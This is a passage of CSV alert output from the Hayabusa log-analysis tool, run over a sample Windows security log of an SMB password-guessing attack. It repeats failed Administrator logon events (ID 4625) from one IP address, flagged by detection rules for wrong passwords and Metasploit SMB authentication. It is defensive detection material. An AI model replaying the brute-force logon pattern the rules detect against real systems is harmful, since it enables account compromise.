NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.673 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.722 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ogjMSxcUw7cF5dMa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.722 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 75uB8ejsSV5CbagM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.773 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5MMHLnyrzBQxluHn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.814 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5QXLn6fpmR52RBAz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.862 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KcdlrSUzcFNpaK5v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJjiRO5rJzZ8XtqP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.944 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ncBraDdG2htkHjXU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.986 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lo9DNrL44Z2S2SYR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.033 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QKcFiKC5QiIoHtxy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.075 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sqvq9GwuPCO15lUV : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4XzgtJ3qUmkFiIY5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.215 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V1wc1Hjb4AK0Np1q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.215 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PKYNy0JyxIlFusMC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.253 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IrcKp13ut9M0pCi0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.298 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B3lJSH0r8iHAVhPF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.341 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ju3lCbvbwvkIKsBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.392 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: dQOHcZeAKQG6wHhC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.435 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.474 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QBPkgoKDLABqdSQb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.474 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wqj4xOCsJg1j3IIh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XhBIu6wUPHc3DZAy : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.561 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W0fI1GhH5YTOHbNN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7mLOWiojillZNYH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.702 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 37dknpwsl8j1WRWi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.702 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gzVum7a21sQe3fMt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.748 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JCFPSQmywelTXg74 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.788 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jCqb6TVV14hVX3NY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 3qJsJrxVARedOdd3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s7iNkrkBNEbXPK0B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.936 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.975 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bio4zciNRolyeHc1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.975 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IFf1vN5MgAIsdZvx : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.026 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zWhgUQSWAycVdYoS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.072 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ugHUJZuKHYfUHXWS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AUeUmYa72BzHfyhK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ksydur7W1mUoOZAE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YNIzopnsXH6OjcUs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.261 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SQljJkaWs8bcaOI1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 1jejn6ZMo564m7ok : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KrpBO1SCHpt27CRM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.440 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ifPePsozBYRLCU3k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vve4r8QwaMLKrrcX : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i9ArElR5k8yLefWu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.569 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4a1Y126C516BaGcz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VL7PnrO2dLsEbebQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GGTlLZ8J9f2PtiuL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.686 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6sVwPFs7bhJgJwRt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dgQNHL9etdHdRw9Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
